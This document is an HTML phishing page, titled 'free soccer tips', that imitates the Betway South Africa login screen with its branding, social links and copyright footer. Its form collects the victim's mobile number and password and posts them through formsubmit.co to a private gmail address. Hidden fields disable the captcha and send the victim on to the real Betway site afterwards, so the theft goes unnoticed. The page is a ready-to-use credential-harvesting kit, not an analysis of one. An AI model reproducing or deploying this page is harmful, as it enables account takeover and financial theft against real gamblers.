<!--DOCTYPE html-->

<html lang="en-US">

<head>

  <meta charset="utf-8" />

  <title>free soccer tips</title>

  <link rel="stylesheet" href="/css/styles.css" />

  <link rel="stylesheet" href="https://fonts.googleapis.com/css?family=Open+Sans:400,700" />

  <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/4.7.0/css/font-awesome.min.css">

  

  <style>

    body {

      background-color: #BABEBB;

      font: 87.5%/1.5em 'Open Sans', sans-serif;

      margin: 0;

      

      min-height: 100vh;

      display: flex;

      justify-content: center;

      align-items: center;

    }

    input {

      border: none;

      font-family: 'Open Sans', Arial, sans-serif;

      font-size: 16px;

      line-height: 1.5em;

      padding: 0;

    }

    p {

      line-height: 1.5em;

      color: black;

      font-weight: bold;

    }

    #login {

      width: 320px;

      text-align: center;

    }

    #login form {

      margin: auto;

      padding: 30px;

      border-bottom-left-radius: 10px;

      border-bottom-right-radius: 10px;

      background: #F4F4F4;

      padding-top: 20px;

      padding-bottom: 10px;

      box-shadow: 5px 5px 10px rgba(0, 0, 0, 1);

    }

    .input {

      background-color: white;

      border: none;

      border-radius: 5px;

      color: ##282828

      ;

      margin-bottom: 1em;

      padding: 10px 16px;

      width: 100%;

      outline: 0;

      height: 40px;

      box-sizing: border-box;

    }

    .submitbtn {

      background: #2DBE5E;

      border: 0;

      width: 100%;

      height: 40px;

      border-radius: 10px;

      color: white;

      cursor: pointer;

      transition: background 0.3s ease-in-out;

    }

    .submitbtn:hover {

      background: #076064;

    }

    h1 {

      text-align: center;

      color: #282828;

      font-size: 50px;

      margin-top: 20px;

      margin-bottom: 20px;

    }

    img {

      border-top-left-radius: 8px;

      border-top-right-radius: 8px;

      width: 99%;

      display: block;

      margin: 0 auto;

      box-shadow: 5px 5px 10px rgba(0, 0, 0, 1);

    }

    .fa {

      padding: 10px;

      font-size: 20px;

      width: 50px;

      text-align: center;

      text-decoration: none;

      padding-bottom: 0px;

      color: #282828;

    }

  </style>

</head>

<body>

  <div id="login">

<img alt="https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcS9RBN-fZIOzYu8-iclpOusQ_DEdHVbsbscNw&amp;usqp=CAU" src="https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcS9RBN-fZIOzYu8-iclpOusQ_DEdHVbsbscNw&amp;usqp=CAU">

    <form action="https://formsubmit.co/doctorzonotoph@gmail.com" method="POST">

      <h1>BetWay</h1>

      <h3 style="text-align: center; color: black;">Login</h3>

      

      <p style="font-weight: bold; font-size: 10px;color: white;text-shadow: black 10%;" ></p>

      

      <input type="number" class="input" id="user" name="mobile_number" placeholder="+27" required/>

<input type="password" class="input" id="pass" name="password" placeholder="password" required/>

      <button type="submit" class="submitbtn">Login</button> 

      

      

      <input type="hidden" name="_next" value="https://www.betway.co.za/LiveGameslobby">

          <input type="hidden" name="_captcha" value="false">

      

      

      <a href="https://www.facebook.com/betwaysouthafrica?mibextid=sAuArU1zVvLjaiq0" class="fa fa-facebook"></a>

      <a href="https://www.instagram.com/betway_sa?igsh=OGQ5ZDc2ODk2ZA==" class="fa fa-instagram"></a>

      <a href="https://x.com/Betway_za?t=IySQkA5U2GNg_s1u4b7i7Q&s=09" class="fa fa-twitter"></a>

      <footer>

        <p>&copy;2023 Betway.co.za. All rights reserved.</p>

      </footer>

    </form>

  </div>

</body>

</html>
</div>